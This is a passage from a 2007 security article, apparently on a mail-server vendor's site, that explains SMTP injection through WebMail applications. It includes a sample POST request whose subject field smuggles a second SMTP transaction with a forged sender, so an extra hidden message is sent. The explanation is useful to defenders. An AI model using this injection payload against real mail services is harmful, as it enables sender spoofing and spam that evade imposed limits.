Mail injection through WebMail applications

You are in: Articles / Security / Mail injection through WebMail applications
Articles & tutorials Backup & Archiving Email Clients Mobility Operating Systems Reporting Tools Security Antispam Antivirus Reports Server Administration Smart Setups Clustering Virtualization Studies & Benchmarks Support Services Web Integration Messaging news Axigen Presents Itself as a Fully Grown Messaging and Collaboration Platform with Version 8 Bucharest, Romania – March 31, 2011 – Axigen... Axigen Enters Indonesia through MTI Bucharest, Romania - February 17, 2011 - Axigen... Experience the Axigen Ajax WebMail with Calendars, Tasks and Notes The Axigen Team (http://www.axigen.com) has added calendars, to do... Upcoming events Switching from Free Open... AXIGEN (www.axigen.com), the professional messaging solution...	Mail injection through WebMail applications Submited by cheatman, on 2007-12-01, in Security SMTP Injection The actual injections that can be performed over the SMTP protocol require the user to be already logged in if authentication is enforced. Therefore, code injection can be used by actual WebMail users to overcome imposed limitations. For example, the POST request to send an e-mail (below): POST http://<webmail-addr>/send.php HTTP/1.1 -----------------------------134475172700422922879687252 Content-Disposition: form-data; name="message-subject" Test Subject for an e-mail -----------------------------134475172700422922879687252 would send an e-mail using these SMTP commands: MAIL FROM: <mailfrom> RCPT TO: <rcptto> DATA Subject: Test Subject for an e-mail . Forging the request to resemble: POST http://<webmail-addr>/send.php HTTP/1.1 -----------------------------134475172700422922879687252 Content-Disposition: form-data; name="message-subject" Test Subject for an e-mail . MAIL FROM: nonexistent@somedomain.com RCPT TO: user@domain.com DATA Email contents -----------------------------134475172700422922879687252 would send another message right after the first one. Using this technique, the original message is not affected, instead another one is added to the request. Normally, such an event would be very tough to spot and single out. Tags: applications, exploit, IMAP, IMAP SMTP, injection, mail, mail server, mail, webmail, SMTP, mail server, applications, IMAP, server, IM, security, server, SMTP, webmail comments (0) \| email this \| \| printable version Rating: « Previous page Page 3 of 4 Next page » Leave a comment Full Name * E-mail * URL: Note: all fields marked with (*) are required Comments (0) To: Subject: Body: Verification code:	Why Register? Already a member? Blacklist monitoring alerts Signup for our real-time monitoring service and receive email notifications each time one of your IPs gets blacklisted. Mail Server Operating System Poll .01 What OS do you use for your email server? Linux Windows Other .02 How many mailboxes do you currently manage? 1-50 51-300 300+ .03 Would you like to comment upon the choosing of this particular OS? DNS Tools Get IP status, owner and location, obtain its corresponding hostname or check specific ports. Ping Statistics Reverse DNS Lookup Whois Info (IP owner) GeoIP Information Check Port Open Relay Test Test if your mail server is an open relay for spammers. Blacklist Checker Check if your IP is listed in DNS based email blacklists (DNSBL)